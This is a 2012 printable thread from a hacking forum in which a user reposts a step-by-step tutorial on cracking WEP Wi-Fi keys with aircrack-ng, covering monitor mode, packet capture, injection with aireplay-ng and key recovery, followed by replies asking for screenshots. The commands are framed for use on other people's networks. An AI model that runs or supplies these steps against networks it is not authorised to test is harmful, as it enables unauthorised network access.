Sinisterly
Cracking WEP with Linux - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: Cracking WEP with Linux (/Thread-Cracking-WEP-with-Linux)



Cracking WEP with Linux - Adorapuff - 10-23-2012

I did not write this I just thought this would be a good one to share, my source will be at the bottom.

In this tutorial we will be using Kismet.

Just put in this command in a terminal to download it straight to your computer.
Code:
sudo apt-get install aircrack-ng airmon-ng airodump-ng aireplay-ng kismet
WEP Cracking

1. Put your Wireless Interface into Monitor Mode:

PHP Code:
airmon-ng start wlan0
(In this example our interface is ‘wlan0′ – To find out your wireless interface typeiwconfig scan or airmon-ng



2. Get Info from the Available Networks:

PHP Code:
airodump-ng mon0
(mon0 is the monitored wlan0 interface) 


3. Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:

PHP Code:
airodump-ng -c channel -w filetosave –bssid macaddrs mon0
(‘channel’ is the Channel Number) (‘filetosave’ is the file that airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the NetworkAll this info is provided by the command used in Step 2. 


4. To boost the proccedure type on a new terminal:

PHP Code:
aireplay-ng -1 0 -a bssid mon0
(‘bssid’ is the MAC Address of the Network


5. When this command is done, capture packets by typing:

PHP Code:
aireplay-ng --p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0
(‘bssid’ is the Networks MAC Address

6. When the above command gets about 20.000 – 30.000 packets you are now able to crack the network by typing:

PHP Code:
aircrack-ng filename.cap
(where instead of ‘filename’.cap you enter the file that aireplay-ng saved at your current directory – This file is named wep-x.cap –x is a numberstarting from ’01′then ’02′ etc….) (Instead of the ‘wep-01.cap’ you can use the ‘wep*.cap’ as in the example to ‘Auto-Select’ the file


7. When aircrack-ng finds the key it will display something like:

PHP Code:
KEY FOUND! [ 12:34:56:78:90 

8. When Finished, make sure you put your wireless interface back to original Mode by typing:
PHP Code:
airmon-ng stop wlan0 
Source There is also tutorials for other types of WIFI encryption types.



RE: Cracking WEP with Linux - Crimson - 10-23-2012

You should mention that it's Linux Backtrack. Tongue


RE: Cracking WEP with Linux - Merkuri - 10-26-2012

Great tutorial if you make imgs will be very good


RE: Cracking WEP with Linux - Adorapuff - 10-26-2012

(10-26-2012, 08:58 PM)Synchro Wrote: Great tutorial if you make imgs will be very good

Sorry my computer can't screenshot


RE: Cracking WEP with Linux - Simbaa - 11-27-2012

is it linux or its backtrack ? O.o it seems same though :/


RE: Cracking WEP with Linux - fieldy2012 - 02-08-2013

yes it would be better if u post a screenshots.. but thanks anyway.